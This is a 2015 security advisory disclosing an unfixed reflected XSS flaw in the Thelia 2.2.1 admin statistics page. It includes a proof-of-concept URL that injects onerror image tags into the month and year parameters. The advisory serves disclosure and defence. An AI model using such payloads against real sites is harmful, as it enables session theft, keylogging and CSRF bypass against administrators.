Thelia 2.2.1: XSS

Thelia 2.2.1: XSS

Date: 2015-11-13 11:35:38
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: Thelia 2.2.1
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact:
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH

2. Overview


Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N


Thelia 2.2.1 suffers from an XSS vulnerability. With this, it is for example possible to inject JavaScript keyloggers, or to bypass CSRF protection.

3. Proof of Concept

http://localhost/thelia_2.1.5/web/admin/home/stats?month=95<img src=no onerror=alert(1)>&year=20155<img src=no onerror=alert(2)>

4. Solution

This issue has not been fixed by the vendor

5. Report Timeline

09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public